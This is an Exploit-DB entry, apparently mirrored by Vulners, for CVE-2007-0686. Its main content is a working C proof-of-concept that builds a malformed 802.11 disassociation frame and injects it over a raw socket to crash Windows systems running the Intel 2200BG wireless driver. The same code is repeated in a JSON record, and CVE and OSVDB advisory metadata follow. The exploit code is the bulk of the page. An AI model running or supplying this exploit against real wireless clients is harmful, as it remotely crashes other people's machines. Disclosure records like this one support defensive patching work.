Search...

Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption

2007-01-29T00:00:00

ID EDB-ID:3224
Type exploitdb
Reporter Breno Silva Pinto
Modified 2007-01-29T00:00:00

Description

Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption. CVE-2007-0686. Dos exploit for windows platform

                                        
                                            /*
Title:  Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption

Description:  The intel wireless mini-pci driver provided with Intel
/*
Title:  Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption

Description:  The intel wireless mini-pci driver provided with Intel
2200BG cards is vulnerable to a remote  memory corruption flaw.
Malformed disassociation packets can be used to corrupt internal kernel
structures, causing a denial of service (BSOD)

This vulnerability was found at Intel 2200 driver version 9.0.3.9
(09/12/2005).

Driver files:

w29n51.sys      9ee38ffcb4cbe5bee6c305700ddc4725
w29mlres.dll    35afeccc4092b69f62d757c4707c74e9
w29NCPA.dll     980f58b157baedc23026dd9302406bdd

Author: Breno Silva Pinto ( Sekure.org ) / bsilva[at]sekure[dot]org)


Proof Of Concept:
*/

#include &lt;unistd.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;sys/socket.h&gt;
#include &lt;sys/ioctl.h&gt;
#include &lt;asm/types.h&gt;
#include &lt;linux/if.h&gt;
#include &lt;linux/if_packet.h&gt;
#include &lt;linux/if_ether.h&gt;
#include &lt;linux/if_arp.h&gt;
#include &lt;netinet/in.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;string.h&gt;
#include &lt;stdio.h&gt;

// 28 bytes disassociation packet.

char d[] = { 0xa0, 0x00,    // 0xa0 pacote Disassociate  0xa000 FC Normal
            0x00, 0x00, // Duration ID
            0x00, 0x12, 0xf0, 0x29, 0x77, 0x00, // DST addr
            0xbb, 0xbb, 0xbb, 0xbb, 0xbb, 0xbb, // SRC addr
            0x00, 0x0f, 0x66, 0x11, 0x7b, 0xd0, // BSS id
            0x00, 0x00, // Frag. Number
            0x01, 0x00, 0x00, 0x00 }; // 2 bytes - Reason code

int main() {
       struct sockaddr_ll link;
       struct ifreq iface;
       int s;
       char packet[sizeof(d)];
       int len = 0;

       if((s=socket(PF_INET, SOCK_DGRAM, 0))&lt;0)
               return 0;

       bzero(&iface,sizeof(iface));
       bzero(&link,sizeof(link));
       bzero(packet,sizeof(d));

       strcpy(iface.ifr_name,"ath0raw");

       if(ioctl(s,SIOCGIFHWADDR, &iface)) {
               return 0;
       }

       if(ioctl(s,SIOCGIFINDEX, &iface)) {
               return -1;
       }

       if((s=socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL)))&lt;0) {
               return -1;
       }

       link.sll_family = AF_PACKET;
       link.sll_ifindex = iface.ifr_ifindex;

 if(bind(s,(struct sockaddr *) &link, sizeof(link))&lt;0) {
               return -1;
       }

       memcpy(packet,d,sizeof(d));
       len = sendto(s,packet,sizeof(d), 0, NULL, 0);
       usleep(5000);
       printf("%d bytes enviados\n",len);

       close(s);

       return 0;
}

// milw0rm.com [2007-01-29]

JSON Vulners Source

Initial Source

{"hash": "225a40c82f48600500a0a862f93ee319d2ecda44085543a9f1945446fb5b9b68", "id": "EDB-ID:3224", "lastseen": "2016-01-31T18:00:20", "viewCount": 1, "bulletinFamily": "exploit", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "edition": 1, "history": [], "enchantments": {"vulnersScore": 7.2}, "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/3224/", "description": "Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption. CVE-2007-0686. Dos exploit for windows platform", "title": "Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption", "sourceData": "/*\r\nTitle: Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption\r\n\r\nDescription: The intel wireless mini-pci driver provided with Intel\r\n/*\r\nTitle: Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption\r\n\r\nDescription: The intel wireless mini-pci driver provided with Intel\r\n2200BG cards is vulnerable to a remote memory corruption flaw.\r\nMalformed disassociation packets can be used to corrupt internal kernel\r\nstructures, causing a denial of service (BSOD)\r\n\r\nThis vulnerability was found at Intel 2200 driver version 9.0.3.9\r\n(09/12/2005).\r\n\r\nDriver files:\r\n\r\nw29n51.sys 9ee38ffcb4cbe5bee6c305700ddc4725\r\nw29mlres.dll 35afeccc4092b69f62d757c4707c74e9\r\nw29NCPA.dll 980f58b157baedc23026dd9302406bdd\r\n\r\nAuthor: Breno Silva Pinto ( Sekure.org ) / bsilva[at]sekure[dot]org)\r\n\r\n\r\nProof Of Concept:\r\n*/\r\n\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <sys/ioctl.h>\r\n#include <asm/types.h>\r\n#include <linux/if.h>\r\n#include <linux/if_packet.h>\r\n#include <linux/if_ether.h>\r\n#include <linux/if_arp.h>\r\n#include <netinet/in.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <stdio.h>\r\n\r\n// 28 bytes disassociation packet.\r\n\r\nchar d[] = { 0xa0, 0x00, // 0xa0 pacote Disassociate 0xa000 FC Normal\r\n 0x00, 0x00, // Duration ID\r\n 0x00, 0x12, 0xf0, 0x29, 0x77, 0x00, // DST addr\r\n 0xbb, 0xbb, 0xbb, 0xbb, 0xbb, 0xbb, // SRC addr\r\n 0x00, 0x0f, 0x66, 0x11, 0x7b, 0xd0, // BSS id\r\n 0x00, 0x00, // Frag. Number\r\n 0x01, 0x00, 0x00, 0x00 }; // 2 bytes - Reason code\r\n\r\nint main() {\r\n struct sockaddr_ll link;\r\n struct ifreq iface;\r\n int s;\r\n char packet[sizeof(d)];\r\n int len = 0;\r\n\r\n if((s=socket(PF_INET, SOCK_DGRAM, 0))<0)\r\n return 0;\r\n\r\n bzero(&iface,sizeof(iface));\r\n bzero(&link,sizeof(link));\r\n bzero(packet,sizeof(d));\r\n\r\n strcpy(iface.ifr_name,\"ath0raw\");\r\n\r\n if(ioctl(s,SIOCGIFHWADDR, &iface)) {\r\n return 0;\r\n }\r\n\r\n if(ioctl(s,SIOCGIFINDEX, &iface)) {\r\n return -1;\r\n }\r\n\r\n if((s=socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL)))<0) {\r\n return -1;\r\n }\r\n\r\n link.sll_family = AF_PACKET;\r\n link.sll_ifindex = iface.ifr_ifindex;\r\n\r\n if(bind(s,(struct sockaddr *) &link, sizeof(link))<0) {\r\n return -1;\r\n }\r\n\r\n memcpy(packet,d,sizeof(d));\r\n len = sendto(s,packet,sizeof(d), 0, NULL, 0);\r\n usleep(5000);\r\n printf(\"%d bytes enviados\\n\",len);\r\n\r\n close(s);\r\n\r\n return 0;\r\n}\r\n\r\n// milw0rm.com [2007-01-29]\r\n", "objectVersion": "1.0", "cvelist": ["CVE-2007-0686"], "published": "2007-01-29T00:00:00", "osvdbidlist": ["37996"], "references": [], "reporter": "Breno Silva Pinto", "modified": "2007-01-29T00:00:00", "href": "https://www.exploit-db.com/exploits/3224/"}

{"result": {"cve": [{"id": "CVE-2007-0686", "type": "cve", "title": "CVE-2007-0686", "description": "The Intel 2200BG 802.11 Wireless Mini-PCI driver 9.0.3.9 (w29n51.sys) allows remote attackers to cause a denial of service (system crash) via crafted disassociation packets, which triggers memory corruption of \"internal kernel structures,\" a different vulnerability than CVE-2006-6651. NOTE: this issue might overlap CVE-2006-3992.", "published": "2007-02-02T20:28:00", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0686", "cvelist": ["CVE-2007-0686"], "lastseen": "2017-10-19T11:12:44"}], "osvdb": [{"id": "OSVDB:37996", "type": "osvdb", "title": "Intel 2200BG 802.11 Wireless Mini-PCI (w29n51.sys) Crafted Disassociation Packets Remote DoS", "description": "# No description provided by the source\n\n## References:\nGeneric Exploit URL: http://milw0rm.com/exploits/3224\n[CVE-2007-0686](https://vulners.com/cve/CVE-2007-0686)\n", "published": "2007-01-29T16:02:52", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "href": "https://vulners.com/osvdb/OSVDB:37996", "cvelist": ["CVE-2007-0686"], "lastseen": "2017-04-28T13:20:34"}]}}